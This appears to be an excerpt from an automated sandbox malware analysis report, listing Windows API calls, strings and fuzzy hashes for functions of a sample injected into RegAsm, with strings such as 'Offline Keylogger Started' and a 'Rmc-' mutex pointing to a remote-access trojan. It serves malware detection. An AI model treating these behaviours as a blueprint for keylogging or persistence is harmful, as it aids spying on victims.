                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                                                                                                                  • __freea.LIBCMT ref: 0044AEB0
                                                                                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                                  • __freea.LIBCMT ref: 0044AEB9
                                                                                                                                                                                                  • __freea.LIBCMT ref: 0044AEDE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 3864826663-2084328917
                                                                                                                                                                                                  • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                                                                                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
• CloseHandle.KERNEL32(00000000), ref: 0041C4EA
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
• CloseHandle.KERNEL32(00000000), ref: 0041C508
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreatePointerWrite
• String ID: xpF
• API String ID: 1852769593-354647465
• Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
• Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
• Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
• Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
APIs
  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
• StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$CloseCurrentOpenQueryValueWow64
• String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 782494840-2070987746
• Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
• Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
• Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
• Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
• __freea.LIBCMT ref: 10008A08
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
• __freea.LIBCMT ref: 10008A11
• __freea.LIBCMT ref: 10008A36
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
• Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
• Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
• Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
• Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
• CloseHandle.KERNEL32(00000000), ref: 0040A729
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleSizeSleep
• String ID: XQG
• API String ID: 1958988193-3606453820
• Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
• Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
• Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
• Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CountEventTick
• String ID: !D@$NG
• API String ID: 180926312-2721294649
• Opcode ID: 4713c36fcbac08608a4361280b7e24833d1112ad43d0243e40292e8207760e54
• Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
• Opcode Fuzzy Hash: 4713c36fcbac08608a4361280b7e24833d1112ad43d0243e40292e8207760e54
• Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
APIs
• CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
• CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
• CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
• Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
• Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
• Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
• Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
APIs
• GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
• CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 00404F94
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Create$EventLocalThreadTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 2532271599-1507639952
• Opcode ID: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
• Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
• Opcode Fuzzy Hash: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
• Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
• RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
• RegCloseKey.KERNEL32(?), ref: 004137EC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238
• Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
• Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
• Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
• Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
• CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
• CloseHandle.KERNEL32(00000000), ref: 00404DDB
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
• API String ID: 3360349984-0
• Opcode ID: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
• Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
• Opcode Fuzzy Hash: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
• Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
APIs
• GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: HandleModuleProtectVirtual
• String ID:
• API String ID: 2905821283-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
• GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
• Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
• Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
• Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
• GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
• Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
• Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
• Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
• CloseHandle.KERNEL32(00000000), ref: 0041C576
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
• Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
• Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
• Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
• Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
APIs
• Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
• GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID: t'`/
• API String ID: 546120528-2084328917
• Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
• Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
• Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
• Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
APIs
• GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Info
• String ID: $t'`/
• API String ID: 1807457897-4170477578
• Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
• Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
• Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
• Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
APIs
• GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: AddressProc__crt_fast_encode_pointer
• String ID: t'`/
• API String ID: 2279764990-2084328917
• Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
• Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
• Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
• Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: String
• String ID: LCMapStringEx$t'`/
• API String ID: 2568140703-4134516538
• Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
• Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
• Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
• Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx$t'`/
• API String ID: 2593887523-4092494707
• Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
• Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
• Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
• Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Alloc
• String ID: FlsAlloc$t'`/
• API String ID: 2773662609-3463628561
• Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
• Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
• Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
• Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
• GetLastError.KERNEL32 ref: 0040D0BE
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID: Rmc-EPF38I
• API String ID: 1925916568-3825396231
• Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
• Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
• Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
• Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
APIs
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: HandleModuleProtectVirtual
• String ID:
• API String ID: 2905821283-0
